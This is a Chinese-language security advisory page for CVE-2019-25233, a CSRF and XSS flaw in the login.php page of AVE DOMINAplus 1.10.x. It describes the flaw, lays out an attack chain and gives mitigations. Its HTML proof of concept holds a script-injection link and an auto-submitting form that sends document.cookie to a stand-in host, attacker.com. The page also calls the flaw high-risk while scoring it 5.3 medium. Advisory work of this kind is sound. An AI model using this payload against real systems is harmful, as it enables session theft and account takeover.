CVE-2019-25233: AVE DOMINAplus 跨站请求伪造与跨站脚本漏洞

漏洞信息

漏洞编号

CVE-2019-25233

漏洞类型

CSRF/XSS

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

AVE DOMINAplus 1.10.x

漏洞概述

CVE-2019-25233是AVE DOMINAplus 1.10.x版本中存在的一个高危安全漏洞，融合了跨站请求伪造(CSRF)和跨站脚本(XSS)两种攻击向量。该漏洞允许未经认证的攻击者通过构造恶意网页，诱骗已登录的管理员用户访问，从而在用户浏览器会话中执行任意JavaScript脚本，同时可绕过同源策略限制执行管理员操作而无需用户同意。攻击者利用login.php页面参数验证不足的缺陷，将恶意脚本注入到页面响应中，当其他用户访问包含恶意内容的页面时，浏览器会执行这些脚本，导致会话cookie被窃取、敏感信息泄露或账户被完全接管。由于该漏洞无需认证即可发起攻击，且影响产品广泛应用于工业自动化和楼宇控制领域，一旦被利用可能造成严重的经济损失和安全威胁。建议相关用户立即采取防护措施，避免遭受攻击。

技术细节

该漏洞主要源于AVE DOMINAplus 1.10.x的login.php页面未对用户输入进行充分的输入验证和输出编码。攻击者可以通过以下方式利用此漏洞：1) 在登录表单参数中注入恶意JavaScript代码，如在用户名或密码字段输入<script>alert(document.cookie)</script>；2) 构造包含恶意参数的URL链接，当受害者点击访问时，恶意脚本会在其浏览器上下文中执行；3) 结合CSRF漏洞，攻击者可以创建自动提交的管理员操作表单，在用户不知情的情况下执行添加管理员账户、修改配置等敏感操作。攻击成功的关键条件包括：目标用户已登录AVE DOMINAplus系统、攻击者能够诱骗用户访问特制链接或网页、目标用户浏览器未启用严格的XSS防护机制。由于漏洞存在于认证流程的入口点，攻击面广泛且利用难度较低，对系统安全性构成严重威胁。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标系统使用的AVE DOMINAplus版本，确认版本为1.10.x且存在login.php页面

STEP 2

步骤2: 构造恶意Payload

攻击者构造XSS payload，如在username参数中注入<script>alert(document.cookie)</script>或窃取cookie的恶意脚本

STEP 3

步骤3: 制作钓鱼页面

攻击者创建包含恶意链接或自动提交表单的钓鱼网页，用于诱骗已登录的管理员用户访问

STEP 4

步骤4: 社会工程攻击

攻击者通过钓鱼邮件、即时消息或其他渠道诱导目标用户点击恶意链接或访问钓鱼页面

STEP 5

步骤5: 触发XSS执行

当目标用户访问恶意链接时，payload被注入到login.php响应中，浏览器执行恶意JavaScript代码

STEP 6

步骤6: 窃取认证凭证

恶意脚本窃取用户会话cookie或表单数据，发送到攻击者控制的服务器

STEP 7

步骤7: 账户接管或权限滥用

攻击者利用窃取的凭证进行账户接管，或结合CSRF执行管理员操作如添加后门账户

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2019-25233 XSS PoC -->
<!-- Target: AVE DOMINAplus 1.10.x login.php -->
<!DOCTYPE html>
<html>
<head>
    <title>CVE-2019-25233 PoC</title>
</head>
<body>
    <h3>CVE-2019-25233: XSS via login.php</h3>
    <p>Malicious Link:</p>
    <a href='http://target/domina/login.php?username=<script>alert(document.cookie)</script>&password=test'>Click Here</a>
    
    <!-- Auto-exploit form -->
    <form id='exploit' action='http://target/domina/login.php' method='POST'>
        <input type='hidden' name='username' value="<script>fetch('http://attacker.com/steal?c='+document.cookie)</script>">
        <input type='hidden' name='password' value='malicious'>
    </form>
    <script>document.getElementById('exploit').submit();</script>
</body>
</html>

影响范围

AVE DOMINAplus 1.10.x

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1) 在Web应用防火墙(WAF)上配置XSS和CSRF防护规则，拦截包含script标签或可疑参数的请求；2) 限制AVE DOMINAplus系统的网络访问，仅允许受信任的IP地址访问管理界面；3) 提醒管理员不要点击来路不明的链接，尤其是包含可疑参数的URL；4) 监控login.php等关键页面的访问日志，及时发现异常请求模式；5) 考虑暂时禁用系统的远程管理功能，待官方修复后再重新启用。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2019-25233
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2019-25233
3 Details https://www.cvedetails.com/cve/CVE-2019-25233/
4 VulDB https://vuldb.com/cve/CVE-2019-25233
5 Link https://www.ave.it
6 Link https://www.domoticaplus.it
7 Link https://www.exploit-db.com/exploits/47821
8 Link https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5547.php
9 Link https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5547.php